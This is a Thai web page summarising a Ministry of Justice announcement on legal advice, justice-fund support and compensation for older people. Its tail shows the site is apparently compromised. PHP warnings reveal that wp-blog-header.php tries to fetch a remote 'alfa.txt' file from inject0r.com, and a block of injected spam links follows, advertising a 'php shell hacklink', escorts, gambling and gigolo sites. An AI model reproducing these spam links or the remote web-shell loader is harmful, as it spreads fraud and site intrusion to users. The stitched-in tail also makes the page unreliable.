การให้คำแนะนำปรึกษาดำเนินการที่เกี่ยวข้องในทางคดี

คำบรรยายภาพ: ผู้สูงอายุขอคำปรึกษา

ที่มารูปภาพ: https://www.insuredd.com/บทความ/ประกันผู้สูงอายุ/

          ผู้สูงอายุมีสิทธิได้รับคำแนะนำ ปรึกษา ดำเนินการอื่นที่เกี่ยวข้องในทางคดีในกรณีที่ผู้สูงอายุ กำลังประสบปัญหาข้อพิพาทต่างๆเพื่อคุ้มครองสิทธิเสรีภาพของผู้สูงอายุ    ในกระบวนการยุติธรรม ดังนี้

รัฐมนตรีว่าการกระทรวงยุติธรรมจึงออกประกาศไว้ ดังต่อไปนี้

กรมคุ้มครองสิทธิและเสรีภาพเป็นหน่วยงานหลักในการดําเนินการให้บริการผู้สูงอายุด้วยความสะดวกรวดเร็วเป็นกรณีพิเศษ ดังนี้

1. เผยแพร่และให้ความรู้เกี่ยวกับสิทธิและเสรีภาพตามที่กฎหมายกําหนดแก่ผู้สูงอายุ

2. ให้คําแนะนํา ปรึกษาทางกฎหมายและอรรถคดี

3. รับเรื่องร้องทุกข์และดําเนินการให้ความช่วยเหลือทางกฎหมายในส่วนที่เกี่ยวข้องกับผู้สูงอายุ

4. สนับสนุนเงินหรือค่าใช้จ่ายอื่น ๆ ตามความจําเป็นในการดําเนินการให้ความช่วยเหลือเรื่องต่าง ๆ ตามระเบียบกระทรวงยุติธรรมว่าด้วยกองทุนยุติธรรม พ.ศ. ๒๕๕๓ ดังนี้

– สนับสนุนเงินหรือค่าใช้จ่ายในการวางเงินประกันการปล่อยตัวชั่วคราว

– สนับสนุนเงินหรือค่าใช้จ่ายในการจ้างทนายความว่าความในคดีอาญา คดีแพ่ง คดีปกครอง หรือการบังคับคดี

– สนับสนุนเงินหรือค่าใช้จ่ายในการชําระค่าธรรมเนียมขึ้นศาลและค่าธรรมเนียมอื่นๆ ในคดีแพ่ง และคดีปกครอง

 – สนับสนุนเงินหรือค่าใช้จ่ายในการดําเนินคดีเกี่ยวกับการพิสูจน์ ค่าใช้จ่ายเกี่ยวกับ ค่าวัสดุ อุปกรณ์ เครื่องมือที่ใช้ในการแสวงหาข้อเท็จจริงและหลักฐาน รวมถึงค่าใช้จ่ายในการจัดเตรียมเอกสาร ค่าใช้จ่ายในการเดินเผชิญสืบของศาล ค่าใช้จ่ายในการสอบแนวเขตรังวัดที่ดิน หรือค่าใช้จ่ายเกี่ยวกับแผนที่ภาพถ่ายทางอากาศหรือทางดาวเทียม และการอ่าน แปล ตีความ และวิเคราะห์

– สนับสนุนเงินหรือค่าใช้จ่ายอื่นของผู้ขอรับการสนับสนุน ได้แก่ ค่าพาหนะเดินทาง ค่าที่พัก ค่าตอบแทน และค่าใช้จ่ายจําเป็นและเหมาะสมตามวัตถุประสงค์กองทุน

– สนับสนุนเงินหรือค่าใช้จ่ายอื่นเพื่อคุ้มครองช่วยเหลือให้ได้รับความปลอดภัยจากการก่ออาชญากรรมหรือการป้องกันการถูกปองร้ายเพราะได้เข้าช่วยเหลือภารกิจของเจ้าหน้าที่รัฐหรือประชาชน

– สนับสนุนเงินหรือค่าใช้จ่ายอันเนื่องมาจากความเสียหายที่เกิดจากการกระทําความผิดทางอาญา การกระทําโดยมิชอบทางปกครอง หรือการกระทําละเมิดในลักษณะที่มีผลกระทบต่อประชาชน หรือกลุ่มบุคคลตั้งแต่สิบรายขึ้นไปหรือที่มีหรืออาจมีผลกระทบต่อความเชื่อมั่นในระบบกระบวนการยุติธรรม

– สนับสนุนเงินหรือค่าใช้จ่ายอื่น ๆ เพื่อให้บรรลุวัตถุประสงค์ ตามระเบียบกระทรวงยุติธรรมว่าด้วยกองทุนยุติธรรม พ.ศ. ๒๕๕๓

2. ให้ความช่วยเหลือทางด้านการเงิน ตามพระราชบัญญัติค่าตอบแทนผู้เสียหายและค่าทดแทนและค่าใช้จ่ายแก่จําเลยในคดีอาญา พ.ศ. ๒๕๔๖

3. ดําเนินการอื่นใดที่จําเป็นและเกี่ยวข้องเพื่อให้เป็นไปตามประกาศฉบับนี้

4. การขอรับบริการ ในเขตกรุงเทพมหานครและปริมณฑล ผู้สูงอายุสามารถติดต่อได้ที่สํานักงานช่วยเหลือทางการเงินแก่ผู้เสียหายและจําเลยในคดีอาญา คลินิกยุติธรรมกรมคุ้มครองสิทธิและเสรีภาพ หรือศูนย์บริการร่วมกระทรวงยุติธรรม

สําหรับในจังหวัดอื่น ๆ ผู้สูงอายุสามารถติดต่อขอรับบริการได้ที่สํานักงานยุติธรรมจังหวัด

ประเด็นสำคัญ สรุปได้ดังนี้

ผู้สูงอายุมีสิทธิ์ได้รับคำแนะนำ ปรึกษา ดำเนินการอื่นที่เกี่ยวข้องในทางการแก้ไขปัญหาครอบครัว

เช่น การส่งเสริมทักษะการจัดการปัญหาความขัดแย้งในครอบครัวโดยสันติวิธี การสร้างความเข้มแข็งของสถาบันครอบครัว การให้คำปรึกษาและประสานเครือข่ายให้ความช่วยเหลือ หรือแก้ไขปัญหาครอบครัว

เรื่อง การกําหนดหน่วยงานผู้มีอํานาจหน้าที่รับผิดชอบดําเนินการเกี่ยวกับการคุ้มครอง การส่งเสริม และการสนับสนุนผู้สูงอายุในด้านต่าง ๆ

 

แหล่งอ้างอิงข้อมูล:

ประกาศกระทรวงยุติธรรม เรื่อง การให้คําแนะนํา ปรึกษา และดําเนินการในส่วนที่เกี่ยวข้องในทางคดีสําหรับผู้สูงอายุ

http://law.m-society.go.th/law2016/uploads/lawfile/20150923_13_52_22_6524.pdf

 

Skip to content
Warning: file_get_contents(): SSL operation failed with code 1. OpenSSL Error messages: error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed in /newdata/vhosts/thaisynergy.org/httpdocs/wp-blog-header.php on line 22

Warning: file_get_contents(): Failed to enable crypto in /newdata/vhosts/thaisynergy.org/httpdocs/wp-blog-header.php on line 22

Warning: file_get_contents(https://inject0r.com/wp-content/uploads/2020/10/alfa.txt): failed to open stream: operation failed in /newdata/vhosts/thaisynergy.org/httpdocs/wp-blog-header.php on line 22

php shell hacklink php shell seobizde.com https://www.jigolokayitci.com/jigololuk-ilani-vermek-istiyorum/ www.jigolosahibinden.com https://www.jigoloajansimiz.xyz/olgun-dul-bayanlar/ jigolo ajansi jigolo siteleri jigolo başvurusu karşıyaka escort sohbet okey oyna süperbahis beylikdüzü escort restbetgiris.co bodrum escort hotforex bedavabonuscum.com kalkinmaatolyesi.org bet bahis Aşık Etme Duası esenyurt escort beylikdüzü escort su kaçağı tespiti betpasgiris.vip sultanbet